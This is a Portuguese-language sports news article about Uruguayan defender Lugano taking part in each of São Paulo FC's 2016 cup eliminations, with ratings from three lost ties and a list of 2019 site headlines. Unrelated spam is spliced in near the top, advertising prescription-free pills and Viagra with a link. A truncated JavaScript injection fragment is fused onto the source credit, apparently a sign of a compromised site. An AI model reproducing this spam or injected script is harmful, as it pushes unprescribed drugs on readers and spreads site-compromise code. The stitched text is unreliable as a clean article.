Destaque Noticia

Reserva, Lugano participa de todas as quedas do São Paulo em 2016

add in cart cheaply pills no rx – http://cooponlineservice.altervista.org/add-in-cart-cheaply-pills-no-rx/

buy a cheap medications without prescription Buy cheap Viagra online

Lugano retornou ao São Paulo para viver as fascinantes “noites de Libertadores”, como ele mesmo disse, mas o destino o reservou emoções mais amargas em sua primeira temporada depois do tão esperado retorno. Titular contra o Juventude na quinta-feira pela Copa do Brasil, o uruguaio esteve presente em todas as eliminações do Tricolor em 2016.

Nas duas últimas, Copa do Brasil e Libertadores, Lugano jogou quando já havia perdido o posto de titular do time. Teve de substituir o capitão Maicon. Na quinta-feira, em Caxias do Sul, o camisa 27 ficou fora por lesão na coxa esquerda. Está em recuperação. Já na competição sul-americana foi expulso na ida e ficou fora da volta das semifinais contra o Atletico Nacional (COL). Em Medellín, Lugano caiu junto com o sonho de conquistar o Tri da América.

Antes, o camisa 5 também formou a dupla de zaga com Rodrigo Caio (sempre com ele) contra o Osasco Audax, na eliminação nas quartas de final do Paulista. O técnico argentino Edgardo Bauza optou por Lugano para segurar Maicon para o duelo contra o The Strongest (BOL), em La Paz, onde o Tricolor avançou ao mata-mata da Libertadores. É bom lembrar que outros jogadores como o goleiro Denis, os laterais Bruno e Mena, Rodrigo Caio, Hudson e Thiago Mendes também estavam em todas as quedas. Mas o torcedor sente mais pelo ídolo.

Na quinta-feira, Lugano completou 200 jogos pelo São Paulo. Foram 24 este ano, dos 59 da equipe. Aos 35 anos, precisa de cuidados redobrados para recuperação física e desfalcou o time no primeiro semestre por conta disso. Depois de uma boa sequência no Brasileiro, se machucou e perdeu na parte técnica.

Vinha sendo preterido por Lyanco até Ricardo Gomes escalá-lo contra o Juventude. Foi a primeira partida do uruguaio com o treinador, mesmo estando à disposição nas outras oito até aqui.

No CT da Barra Funda, destaca-se a importância do ídolo fora de campo. Lugano exerce grande liderança entre os atletas, dá exemplos, conduz bem as conversas com a diretoria. É a voz do clube para a torcida. Em campo, sofre com o time.

AS QUEDAS DE 2016

Juventude

Lugano não comprometeu, com atuação segura na vitória por 1 a 0 na quinta-feira. Ganhou nota 6,0 do LANCE!, segurando as investidas de Hugo. ………………….

Atlético Nacional

Uruguaio falhou no primeiro gol dos colombianos na derrota por 2 a 1 em Medellín. Acabou expulso no segundo tempo por reclamar da arbitragem, que revoltou os são-paulinos no último jogo da Libertadores. Ficou com 4,5 no L!. ………………….

Osasco Audax

São Paulo foi goleado por 4 a 1 com atuação coletiva desastrosa em Osasco. Time de Fernando Diniz envolveu a defesa tricolor, com Lugano ao lado de Rodrigo Caio. O uruguaio e Rodrigo ficaram com nota 4,0 no LANCE!.

Fonte: LanceNetvar d=document;var s=d.createElement(‘script’);

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque Noticia

Mais em Destaque Noticia

Espera por Cuca incomoda aliados de Leco no São Paulo

saopauloadmin16 de fevereiro de 2019

Federação define árbitro de Corinthians x São Paulo pelo Paulistão 2019

saopauloadmin15 de fevereiro de 2019

R$ 150 MILHÕES: Meta de venda em 2019 sobe com eliminação precoce na Libertadores; Vexame e Prejuízo…

saopauloadmin14 de fevereiro de 2019

Médico de Cuca contraria Leco e libera treinador apenas em maio

saopauloadmin14 de fevereiro de 2019

Relacionados para São Paulo x Talleres-ARG

saopauloadmin12 de fevereiro de 2019

Possíveis novas camisas de treino do São Paulo vazam na internet

saopauloadmin12 de fevereiro de 2019

Trivial? Jardine aponta ‘receita’ para São Paulo seguir adiante na Libertadores

saopauloadmin11 de fevereiro de 2019

Jardine tem pior aproveitamento no São Paulo desde Doriva, em 2015

saopauloadmin10 de fevereiro de 2019

Pior início assombra o São aulo às vésperas de decisão na Liberadores

saopauloadmin10 de fevereiro de 2019